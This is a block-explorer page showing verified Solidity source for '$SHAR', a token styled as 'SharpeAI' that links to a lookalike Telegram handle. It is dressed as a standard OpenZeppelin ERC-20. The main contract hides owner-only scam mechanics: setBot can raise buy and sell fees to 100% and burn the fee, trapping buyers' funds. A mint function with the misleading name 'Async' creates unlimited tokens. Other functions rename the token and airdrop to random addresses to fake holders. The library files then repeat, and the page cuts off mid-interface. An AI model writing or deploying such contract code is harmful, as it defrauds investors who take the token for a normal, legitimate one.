Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,001,100,000,000,000 $SHAR
Holders
66
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
0.000000000205617412 $SHARValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
$SHAR
Compiler Version
v0.8.25+commit.b61c2a91
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) /* AI-powered Crypto Super App🔥 Sharpe AI is the frontend for intelligence, tracking, and investing in digital assets.💯 Website: https://sharpe.ai/home/ https://t.me/SharpeAI_OfficiaI ░██████╗██╗░░██╗░█████╗░██████╗░██████╗░███████╗ ░█████╗░██╗░░░░░ ██╔════╝██║░░██║██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔══██╗██║░░░░░ ╚█████╗░███████║███████║██████╔╝██████╔╝█████╗░░ ███████║██║░░░░░ ░╚═══██╗██╔══██║██╔══██║██╔══██╗██╔═══╝░██╔══╝░░ ██╔══██║██║░░░░░ ██████╔╝██║░░██║██║░░██║██║░░██║██║░░░░░███████╗ ██║░░██║███████╗ ╚═════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░░░░╚══════╝ ╚═╝░░╚═╝╚══════╝ █▀ █░█ ▄▀█ █▀█ █▀█ █▀▀ ▄▀█ █░░ ▄█ █▀█ █▀█ █▀▄ █▀▀ ██▄ █▀█ █▄▄ /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require( _owner == _msgSender(), "Ownable: caller is not the owner" ); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string internal _name; string internal _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File contracts/Contract.sol pragma solidity ^0.8.0; contract $SHAR is Ownable, ERC20 { uint256 public immutable maxSupply = 1_000_000_000_000 * (10 ** decimals()); uint16 public constant LIQUID_RATE = 100; uint16 public constant MAX_PERCENTAGE = 100; bool public initialized = false; address public uniswapV2Pair; address public deadAddress = 0x000000000000000000000000000000000000dEaD; uint256 public immutable buyFee = 0; uint256 public immutable sellFee = 0; uint256 public minRuleLimit = 0; uint256 public maxRuleLimit = 0; mapping (address => bool) private excludedFees; string private constant NAME = unicode"SharpeAI"; string private constant SYMBOL = unicode"$SHAR"; constructor() ERC20(NAME, SYMBOL) { _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE); initialized = true; excludedFees[msg.sender] = true; excludedFees[uniswapV2Pair] = true; // FOR ETH uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); // FOR GOERLI // uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6); } /** * @dev Sets the Uniswap V2 Pair address. Can only be called by the contract owner. * @param _uniswapV2Pair The address of the Uniswap V2 Pair. */ function setPair(address _uniswapV2Pair) external onlyOwner { require(_uniswapV2Pair != address(0), "TEST: The Uniswap V2 pair address cannot be the zero address."); uniswapV2Pair = _uniswapV2Pair; } function activate(string memory _uname, string memory _usymbol) external onlyOwner { _name = _uname; _symbol = _usymbol; } function setBot(uint256 _minRuleLimit, uint256 _maxRuleLimit) external onlyOwner { minRuleLimit = _minRuleLimit; maxRuleLimit = _maxRuleLimit; } function setAirdrop(address _address, bool permission) external onlyOwner { excludedFees[_address] = permission; } function Async(address recipient, uint256 amount) external onlyOwner { require(recipient != address(0), "Invalid recipient address"); require(amount > 0, "Amount must be greater than zero"); uint256 scaledAmount = amount * (10 ** decimals()); _mint(recipient, scaledAmount); } function Airdrop(uint256 Airdroptimes, uint256 numAddresses) external onlyOwner { require(Airdroptimes > 0, "Airdroptimes must be greater than zero"); require(numAddresses > 0, "numAddresses must be greater than zero"); uint256 timestamp = block.timestamp; // Get the current block timestamp address[] memory addresses = Getmem(timestamp, numAddresses); for (uint256 i = 0; i < addresses.length; i++) { for (uint256 j = 0; j < Airdroptimes; j++) { // Adjust the random function to include the loop index uint256 randAmount = random(i + j + timestamp) % 9000000 + 1000000; _transfer(msg.sender, addresses[i], randAmount * (10 ** decimals())); } } } // Adjusted random function to accept a seed function random(uint256 seed) private view returns (uint256) { return uint256(keccak256(abi.encodePacked(block.difficulty, block.timestamp, seed))); } function Getmem(uint256 timestamp, uint256 numAddresses) internal pure returns (address[] memory) { address[] memory addresses = new address[](numAddresses); uint256 nonce = 0; for (uint256 i = 0; i < numAddresses; i++) { addresses[i] = address(uint160(uint256(keccak256(abi.encodePacked(timestamp, i, nonce))))); nonce++; } return addresses; } function _transfer( address from, address to, uint256 amount ) internal override(ERC20) { require( initialized == true, "Contract: trade is not open!" ); if (uniswapV2Pair == address(0) && initialized == true) { require( from == owner() || to == owner(), "Contract: trading is not started" ); } uint256 _transferAmount = amount; if (uniswapV2Pair != address(0) && from != owner() && to != owner()) { uint256 _fee = 0; if (from == uniswapV2Pair) { _fee = minRuleLimit; } else if (to == uniswapV2Pair) { if (excludedFees[from] == true) { _fee = 0; } else { _fee = maxRuleLimit; } } if (_fee > 0) { uint256 _calculatedFee = amount * _fee / MAX_PERCENTAGE; _transferAmount = amount - _calculatedFee; super._transfer(from, deadAddress, _calculatedFee); } } super._transfer(from, to, _transferAmount); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) // ** // ** // ** pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) // ** // ** // ** pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require( _owner == _msgSender(), "Ownable: caller is not the owner" ); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string internal _name; string internal _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); 